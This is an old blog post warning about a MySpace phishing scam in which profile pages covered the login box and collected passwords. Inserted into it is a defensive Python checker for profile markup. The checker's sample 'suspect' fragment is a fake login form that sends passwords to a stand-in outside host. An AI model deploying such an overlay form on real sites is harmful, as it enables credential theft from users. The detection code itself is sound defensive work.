Welcome to PChuck's Network News.

Thursday, November 09, 2006

MySpace? Stay Away!

MySpace, like all active Internet services, is creating new possibilities for its members to "smarten up" their space, in this case, their home pages. In their attention to detail (or lack of attention), MySpace appears to make it possible for someone to create a home page that overwrites the portion of the screen where the account name and password fields sit, where you log in.

Here is a very nice phishing opportunity. And the phishers didn't pass it up.

When you log in, you innocently enter your account name (user name) and password. It's picked up by the phisher script, and added to their database. You log in again, see your home page, and never realise that your details are now in the hands of the bad guys. Somewhere around 35,000 phishes, and you're one.
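A site that accepts member-supplied page markup can check each fragment for the ingredients described above before publishing it: a password field, a form that posts elsewhere, and styling that can place content over the real login area. The following is an added example, not code from MySpace or from the original post; the host name `social.example`, the finding labels and the sample fragments are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "social.example"  # assumption: the hosting site's own host name
OVERLAY_CSS = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)

class ProfileMarkupAudit(HTMLParser):
    """Collects reasons a member-supplied fragment could imitate the login box."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        # A password input has no business inside profile content.
        if tag == "input" and a.get("type", "").strip().lower() == "password":
            self.findings.append("password-field")
        # Any form is suspicious; one that submits to another host more so.
        if tag == "form":
            host = urlparse(a.get("action", "").strip()).hostname
            self.findings.append("offsite-form" if host and host != SITE_HOST else "form")
        # Inline positioning can lift content out of the profile area.
        if OVERLAY_CSS.search(a.get("style", "")):
            self.findings.append("overlay-style")
        if tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # Same positioning check for rules inside a <style> block.
        if self._in_style and OVERLAY_CSS.search(data):
            self.findings.append("overlay-style")

def audit_profile(fragment):
    """Return the sorted, de-duplicated findings for one profile fragment."""
    parser = ProfileMarkupAudit()
    parser.feed(fragment)
    parser.close()
    return sorted(set(parser.findings))

# Constructed sample fragments, not taken from any real page.
BENIGN = '<div style="color:#336699"><b>About me</b><p>I like music.</p></div>'
SUSPECT = ('<style>.box{position: absolute; top:0; left:0}</style><div class="box">'
           '<form action="http://collector.example/save" method="post">'
           '<input name="email"><input type="PASSWORD" name="pw"></form></div>')
```

A fragment with any finding would be held for review or stripped rather than published as-is.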

As reported in DSLR Forums, "Huge myspace phishing scam":

MySpace is unable to recognize the risks when a new user creates their page to host a copy of the myspace login box that steals passwords.

We have verified that the simple scam has netted over 700,000 myspace login email addresses and passwords so far, and the data is still being collected as these trojan myspace pages are still scattered all over the site.


Note that the 700,000 MySpace login email addresses and passwords apparently resulted from a mere 35,000 individuals, each MySpace phish victim being fooled an average of 20 times.

The average MySpace member is 13 and probably lacking in capital. The possibility that victims use duplicated account names and passwords on similar services, eBay and PayPal for instance, is probably going to keep the phishers happy for a while, though.

If you've used your MySpace account recently, you need to change your password there, and on any other accounts or services (eBay and PayPal, to start) where you're using similar account names and passwords. When you change your password, make it complex - not something simple like "password1".

If you've used your MySpace account recently, don't count on MySpace sending you a vulnerability warning. Get this done now.
